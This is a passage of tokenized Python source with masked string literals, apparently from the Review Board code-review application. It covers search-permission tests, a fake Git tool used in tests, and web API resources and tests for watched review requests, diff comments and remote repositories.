reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repository_as_submitter ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> submitter = user , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repository_and_target_people ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> review_request . target_people . add ( user ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . 
assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_review_requests_with_private_group_and_target_people ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> review_request . target_people . add ( user ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_search_review_request_id ( self ) : <EOL> """<STR_LIT>""" <EOL> site = Site . objects . get_current ( ) <EOL> site . domain = '<STR_LIT>' <EOL> site . save ( ) <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' % review_request . id ) <EOL> self . assertEqual ( response . url , <EOL> build_server_url ( review_request . get_absolute_url ( ) ) ) <EOL> def test_search_numeric_non_id ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> review_request = self . 
create_review_request ( bugs_closed = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def reindex ( self ) : <EOL> """<STR_LIT>""" <EOL> call_command ( '<STR_LIT>' , interactive = False ) <EOL> def search ( self , q , filter_by = None ) : <EOL> """<STR_LIT>""" <EOL> options = { <EOL> '<STR_LIT:q>' : q , <EOL> } <EOL> if filter_by : <EOL> options [ '<STR_LIT>' ] = filter_by <EOL> return self . client . get ( local_site_reverse ( '<STR_LIT>' ) , options ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils import six <EOL> from django . utils . six . moves import range <EOL> from reviewboard . scmtools . core import Branch , Commit , ChangeSet <EOL> from reviewboard . scmtools . git import GitTool <EOL> class TestTool ( GitTool ) : <EOL> name = '<STR_LIT>' <EOL> supports_post_commit = True <EOL> def get_repository_info ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get_fields ( self ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_diffs_use_absolute_paths ( self ) : <EOL> return False <EOL> def get_branches ( self ) : <EOL> return [ <EOL> Branch ( id = '<STR_LIT>' , commit = '<STR_LIT:5>' , default = True ) , <EOL> Branch ( id = '<STR_LIT>' , commit = '<STR_LIT>' , default = False ) , <EOL> ] <EOL> def get_commits ( self , branch = None , start = None ) : <EOL> return [ <EOL> Commit ( '<STR_LIT>' % i , six . text_type ( i ) , <EOL> '<STR_LIT>' % i , <EOL> '<STR_LIT>' % i , <EOL> six . text_type ( i - <NUM_LIT:1> ) ) <EOL> for i in range ( int ( start or <NUM_LIT:10> ) , <NUM_LIT:0> , - <NUM_LIT:1> ) <EOL> ] <EOL> def get_change ( self , commit_id ) : <EOL> return Commit ( <EOL> author_name = '<STR_LIT>' , <EOL> id = commit_id , <EOL> date = '<STR_LIT>' , <EOL> message = '<STR_LIT>' , <EOL> diff = b'<STR_LIT:\n>' . join ( [ <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT:->" , <EOL> b"<STR_LIT>" , <EOL> ] ) ) <EOL> def get_file ( self , path , revision ) : <EOL> return '<STR_LIT>' <EOL> def file_exists ( self , path , revision , ** kwargs ) : <EOL> if path == '<STR_LIT>' : <EOL> return True <EOL> return super ( TestTool , self ) . 
file_exists ( path , revision , ** kwargs ) <EOL> @ classmethod <EOL> def check_repository ( cls , path , * args , ** kwargs ) : <EOL> pass <EOL> class TestToolSupportsPendingChangeSets ( TestTool ) : <EOL> supports_pending_changesets = True <EOL> def get_changeset ( self , changesetid , allow_empty = False ) : <EOL> changeset = ChangeSet ( ) <EOL> changeset . changenum = changesetid <EOL> changeset . description = '<STR_LIT>' <EOL> changeset . pending = True <EOL> if not allow_empty : <EOL> changeset . files = [ '<STR_LIT>' ] <EOL> changeset . summary = '<STR_LIT>' '<STR_LIT>' <EOL> changeset . testing_done = "<STR_LIT>" <EOL> return changeset </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . http import HttpResponseRedirect <EOL> from django . utils import six <EOL> from djblets . webapi . decorators import ( webapi_login_required , <EOL> webapi_response_errors , <EOL> webapi_request_fields ) <EOL> from djblets . webapi . errors import ( DOES_NOT_EXIST , NOT_LOGGED_IN , <EOL> PERMISSION_DENIED ) <EOL> from reviewboard . accounts . models import Profile <EOL> from reviewboard . webapi . base import WebAPIResource <EOL> from reviewboard . webapi . decorators import ( webapi_check_local_site , <EOL> webapi_check_login_required ) <EOL> from reviewboard . webapi . resources import resources <EOL> class BaseWatchedObjectResource ( WebAPIResource ) : <EOL> """<STR_LIT>""" <EOL> watched_resource = None <EOL> uri_object_key = '<STR_LIT>' <EOL> profile_field = None <EOL> star_function = None <EOL> unstar_function = None <EOL> allowed_methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> @ property <EOL> def uri_object_key_regex ( self ) : <EOL> return self . watched_resource . uri_object_key_regex <EOL> def get_queryset ( self , request , username , local_site_name = None , <EOL> * args , ** kwargs ) : <EOL> try : <EOL> local_site = self . _get_local_site ( local_site_name ) <EOL> if local_site : <EOL> user = local_site . users . get ( username = username ) <EOL> profile = user . get_profile ( ) <EOL> else : <EOL> profile = Profile . objects . get ( user__username = username ) <EOL> q = self . watched_resource . get_queryset ( <EOL> request , local_site_name = local_site_name , * args , ** kwargs ) <EOL> q = q . filter ( starred_by = profile ) <EOL> return q <EOL> except Profile . DoesNotExist : <EOL> return self . watched_resource . model . objects . 
none ( ) <EOL> @ webapi_check_login_required <EOL> def get ( self , request , watched_obj_id , * args , ** kwargs ) : <EOL> try : <EOL> q = self . get_queryset ( request , * args , ** kwargs ) <EOL> obj = self . get_watched_object ( q , watched_obj_id , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> return HttpResponseRedirect ( <EOL> self . watched_resource . get_href ( obj , request , * args , ** kwargs ) ) <EOL> @ webapi_check_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST ) <EOL> def get_list ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> objects = [ <EOL> self . serialize_object ( obj ) <EOL> for obj in self . get_queryset ( request , is_list = True , <EOL> * args , ** kwargs ) <EOL> ] <EOL> return <NUM_LIT:200> , { <EOL> self . list_result_key : objects , <EOL> } <EOL> except User . DoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> @ webapi_request_fields ( required = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : six . text_type , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> def create ( self , request , object_id , * args , ** kwargs ) : <EOL> try : <EOL> obj_kwargs = kwargs . copy ( ) <EOL> obj_kwargs [ self . watched_resource . uri_object_key ] = object_id <EOL> obj = self . watched_resource . get_object ( request , * args , <EOL> ** obj_kwargs ) <EOL> user = resources . user . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . user . has_modify_permissions ( request , user , <EOL> * args , ** kwargs ) : <EOL> return self . get_no_access_error ( request ) <EOL> profile , profile_is_new = Profile . objects . get_or_create ( user = request . user ) <EOL> star = getattr ( profile , self . 
star_function ) <EOL> star ( obj ) <EOL> return <NUM_LIT> , { <EOL> self . item_result_key : obj , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> def delete ( self , request , watched_obj_id , * args , ** kwargs ) : <EOL> try : <EOL> obj_kwargs = kwargs . copy ( ) <EOL> obj_kwargs [ self . watched_resource . uri_object_key ] = watched_obj_id <EOL> obj = self . watched_resource . get_object ( request , * args , <EOL> ** obj_kwargs ) <EOL> user = resources . user . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . user . has_modify_permissions ( request , user , <EOL> * args , ** kwargs ) : <EOL> return self . get_no_access_error ( request ) <EOL> profile , profile_is_new = Profile . objects . get_or_create ( user = request . user ) <EOL> if not profile_is_new : <EOL> unstar = getattr ( profile , self . unstar_function ) <EOL> unstar ( obj ) <EOL> return <NUM_LIT> , { } <EOL> def serialize_object ( self , obj , * args , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT:id>' : obj . pk , <EOL> self . item_result_key : obj , <EOL> } <EOL> def get_watched_object ( self , queryset , obj_id , * args , ** kwargs ) : <EOL> return queryset . get ( pk = obj_id ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from djblets . util . decorators import augment_method_from <EOL> from djblets . webapi . decorators import ( webapi_login_required , <EOL> webapi_response_errors , <EOL> webapi_request_fields ) <EOL> from djblets . webapi . errors import ( DOES_NOT_EXIST , INVALID_FORM_DATA , <EOL> NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> from reviewboard . diffviewer . models import FileDiff <EOL> from reviewboard . webapi . decorators import webapi_check_local_site <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . resources . base_diff_comment import BaseDiffCommentResource <EOL> class ReviewDiffCommentResource ( BaseDiffCommentResource ) : <EOL> """<STR_LIT>""" <EOL> allowed_methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> policy_id = '<STR_LIT>' <EOL> model_parent_key = '<STR_LIT>' <EOL> mimetype_list_resource_name = '<STR_LIT>' <EOL> mimetype_item_resource_name = '<STR_LIT>' <EOL> def get_queryset ( self , request , review_id , * args , ** kwargs ) : <EOL> q = super ( ReviewDiffCommentResource , self ) . get_queryset ( <EOL> request , * args , ** kwargs ) <EOL> return q . filter ( review = review_id ) <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , INVALID_FORM_DATA , <EOL> NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> @ webapi_request_fields ( <EOL> required = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . 
REQUIRED_CREATE_FIELDS ) , <EOL> optional = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . OPTIONAL_CREATE_FIELDS ) , <EOL> allow_unknown = True , <EOL> ) <EOL> def create ( self , request , filediff_id , interfilediff_id = None , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> review_request = resources . review_request . get_object ( request , * args , ** kwargs ) <EOL> review = resources . review . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if not resources . review . has_modify_permissions ( request , review ) : <EOL> return self . get_no_access_error ( request ) <EOL> filediff = None <EOL> interfilediff = None <EOL> invalid_fields = { } <EOL> try : <EOL> filediff = FileDiff . objects . get ( <EOL> pk = filediff_id , <EOL> diffset__history__review_request = review_request ) <EOL> except ObjectDoesNotExist : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> if filediff and interfilediff_id : <EOL> if interfilediff_id == filediff . id : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> else : <EOL> try : <EOL> interfilediff = FileDiff . objects . get ( <EOL> pk = interfilediff_id , <EOL> diffset__history = filediff . diffset . history ) <EOL> except ObjectDoesNotExist : <EOL> invalid_fields [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> if invalid_fields : <EOL> return INVALID_FORM_DATA , { <EOL> '<STR_LIT>' : invalid_fields , <EOL> } <EOL> new_comment = self . create_comment ( <EOL> review = review , <EOL> filediff = filediff , <EOL> interfilediff = interfilediff , <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> review . comments . add ( new_comment ) <EOL> return <NUM_LIT> , { <EOL> self . 
item_result_key : new_comment , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ webapi_login_required <EOL> @ webapi_response_errors ( DOES_NOT_EXIST , NOT_LOGGED_IN , PERMISSION_DENIED ) <EOL> @ webapi_request_fields ( <EOL> optional = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . OPTIONAL_UPDATE_FIELDS ) , <EOL> allow_unknown = True , <EOL> ) <EOL> def update ( self , request , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resources . review_request . get_object ( request , * args , ** kwargs ) <EOL> review = resources . review . get_object ( request , * args , ** kwargs ) <EOL> diff_comment = self . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if self . should_update_issue_status ( diff_comment , ** kwargs ) : <EOL> return self . update_issue_status ( request , self , * args , ** kwargs ) <EOL> if not resources . review . has_modify_permissions ( request , review ) : <EOL> return self . get_no_access_error ( request ) <EOL> self . update_comment ( diff_comment , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> return <NUM_LIT:200> , { <EOL> self . item_result_key : diff_comment , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseDiffCommentResource ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseDiffCommentResource ) <EOL> def get_list ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> review_diff_comment_resource = ReviewDiffCommentResource ( ) </s>
<s> from __future__ import unicode_literals <EOL> from djblets . util . decorators import augment_method_from <EOL> from reviewboard . webapi . decorators import webapi_check_local_site <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . resources . base_watched_object import BaseWatchedObjectResource <EOL> class WatchedReviewRequestResource ( BaseWatchedObjectResource ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> uri_name = '<STR_LIT>' <EOL> profile_field = '<STR_LIT>' <EOL> star_function = '<STR_LIT>' <EOL> unstar_function = '<STR_LIT>' <EOL> @ property <EOL> def watched_resource ( self ) : <EOL> """<STR_LIT>""" <EOL> return resources . review_request <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def get_list ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def create ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def serialize_object ( self , obj , * args , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT:id>' : obj . display_id , <EOL> self . item_result_key : obj , <EOL> } <EOL> def get_watched_object ( self , queryset , obj_id , local_site_name = None , <EOL> * args , ** kwargs ) : <EOL> if local_site_name : <EOL> return queryset . get ( local_id = obj_id ) <EOL> else : <EOL> return queryset . get ( pk = obj_id ) <EOL> watched_review_request_resource = WatchedReviewRequestResource ( ) </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> from django . utils import six <EOL> from kgb import SpyAgency <EOL> from reviewboard . hostingsvcs . github import GitHub <EOL> from reviewboard . hostingsvcs . models import HostingServiceAccount <EOL> from reviewboard . hostingsvcs . repository import RemoteRepository <EOL> from reviewboard . hostingsvcs . utils . paginator import APIPaginator <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . tests . base import BaseWebAPITestCase <EOL> from reviewboard . webapi . tests . mimetypes import ( <EOL> remote_repository_item_mimetype , <EOL> remote_repository_list_mimetype ) <EOL> from reviewboard . webapi . tests . mixins import BasicTestsMetaclass <EOL> from reviewboard . webapi . tests . urls import ( get_remote_repository_item_url , <EOL> get_remote_repository_list_url ) <EOL> def _compare_item ( self , item_rsp , remote_repository ) : <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:id>' ] , remote_repository . id ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:name>' ] , remote_repository . name ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . owner ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . scm_type ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:path>' ] , remote_repository . path ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . mirror_path ) <EOL> class RemoteRepositoryTestPaginator ( APIPaginator ) : <EOL> def __init__ ( self , results ) : <EOL> self . results = results <EOL> super ( RemoteRepositoryTestPaginator , self ) . __init__ ( client = None , <EOL> url = '<STR_LIT>' ) <EOL> def fetch_url ( self , url ) : <EOL> return { <EOL> '<STR_LIT:data>' : self . results , <EOL> } <EOL> @ six . 
add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceListTests ( SpyAgency , BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . remote_repository <EOL> basic_get_use_admin = True <EOL> compare_item = _compare_item <EOL> def setup_http_not_allowed_list_test ( self , user ) : <EOL> account = HostingServiceAccount . objects . create ( service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' ) <EOL> return get_remote_repository_list_url ( account ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name , <EOL> populate_items ) : <EOL> account = HostingServiceAccount . objects . create ( <EOL> service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' , <EOL> local_site = self . get_local_site_or_none ( name = local_site_name ) , <EOL> data = json . dumps ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) ) <EOL> service = account . service <EOL> remote_repositories = [ <EOL> RemoteRepository ( service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) , <EOL> RemoteRepository ( service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) , <EOL> ] <EOL> paginator = RemoteRepositoryTestPaginator ( remote_repositories ) <EOL> self . spy_on ( GitHub . get_remote_repositories , <EOL> call_fake = lambda * args , ** kwargs : paginator ) <EOL> return ( get_remote_repository_list_url ( account , local_site_name ) , <EOL> remote_repository_list_mimetype , <EOL> remote_repositories ) <EOL> @ six . 
add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceItemTests ( SpyAgency , BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . remote_repository <EOL> basic_get_use_admin = True <EOL> compare_item = _compare_item <EOL> def setup_http_not_allowed_item_test ( self , user ) : <EOL> account = HostingServiceAccount . objects . create ( service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' ) <EOL> remote_repository = RemoteRepository ( <EOL> account . service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' ) <EOL> return get_remote_repository_item_url ( remote_repository ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name ) : <EOL> account = HostingServiceAccount . objects . create ( <EOL> service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' , <EOL> local_site = self . get_local_site_or_none ( name = local_site_name ) , <EOL> data = json . dumps ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) ) <EOL> remote_repository = RemoteRepository ( <EOL> account . service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) <EOL> self . spy_on ( GitHub . get_remote_repository , <EOL> call_fake = lambda * args , ** kwargs : remote_repository ) <EOL> return ( get_remote_repository_item_url ( remote_repository , <EOL> local_site_name ) , <EOL> remote_repository_item_mimetype , <EOL> remote_repository ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils import six <EOL> from djblets . testing . decorators import add_fixtures <EOL> from djblets . webapi . errors import DOES_NOT_EXIST , PERMISSION_DENIED <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . tests . base import BaseWebAPITestCase <EOL> from reviewboard . webapi . tests . mimetypes import ( <EOL> watched_review_group_item_mimetype , <EOL> watched_review_group_list_mimetype ) <EOL> from reviewboard . webapi . tests . mixins import BasicTestsMetaclass <EOL> from reviewboard . webapi . tests . urls import ( <EOL> get_review_group_item_url , <EOL> get_watched_review_group_item_url , <EOL> get_watched_review_group_list_url ) <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceListTests ( BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . watched_review_group <EOL> def compare_item ( self , item_rsp , obj ) : <EOL> watched_rsp = item_rsp [ '<STR_LIT>' ] <EOL> self . assertEqual ( watched_rsp [ '<STR_LIT:id>' ] , obj . pk ) <EOL> self . assertEqual ( watched_rsp [ '<STR_LIT:name>' ] , obj . name ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name , <EOL> populate_items ) : <EOL> if populate_items : <EOL> group = self . create_review_group ( with_local_site = with_local_site ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> items = [ group ] <EOL> else : <EOL> items = [ ] <EOL> return ( get_watched_review_group_list_url ( user . username , <EOL> local_site_name ) , <EOL> watched_review_group_list_mimetype , <EOL> items ) <EOL> def setup_basic_post_test ( self , user , with_local_site , local_site_name , <EOL> post_valid_data ) : <EOL> group = self . 
create_review_group ( with_local_site = with_local_site ) <EOL> if post_valid_data : <EOL> post_data = { <EOL> '<STR_LIT>' : group . name , <EOL> } <EOL> else : <EOL> post_data = { } <EOL> return ( get_watched_review_group_list_url ( user . username , <EOL> local_site_name ) , <EOL> watched_review_group_item_mimetype , <EOL> post_data , <EOL> [ group ] ) <EOL> def check_post_result ( self , user , rsp , group ) : <EOL> profile = user . get_profile ( ) <EOL> self . assertIn ( group , profile . starred_groups . all ( ) ) <EOL> def test_post_with_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> rsp = self . api_post ( <EOL> get_watched_review_group_list_url ( self . user . username ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_post_with_site_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _login_user ( local_site = True ) <EOL> rsp = self . api_post ( <EOL> get_watched_review_group_list_url ( user . username , <EOL> self . local_site_name ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceItemTests ( BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> test_http_methods = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . watched_review_group <EOL> def setup_http_not_allowed_item_test ( self , user ) : <EOL> return get_watched_review_group_item_url ( user . 
username , '<STR_LIT>' ) <EOL> def setup_basic_delete_test ( self , user , with_local_site , local_site_name ) : <EOL> group = self . create_review_group ( with_local_site = with_local_site ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> return ( get_watched_review_group_item_url ( user . username , group . name , <EOL> local_site_name ) , <EOL> [ profile , group ] ) <EOL> def check_delete_result ( self , user , profile , group ) : <EOL> self . assertNotIn ( group , profile . starred_groups . all ( ) ) <EOL> def test_delete_with_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> rsp = self . api_delete ( <EOL> get_watched_review_group_item_url ( self . user . username , <EOL> '<STR_LIT>' ) , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> group = self . create_review_group ( ) 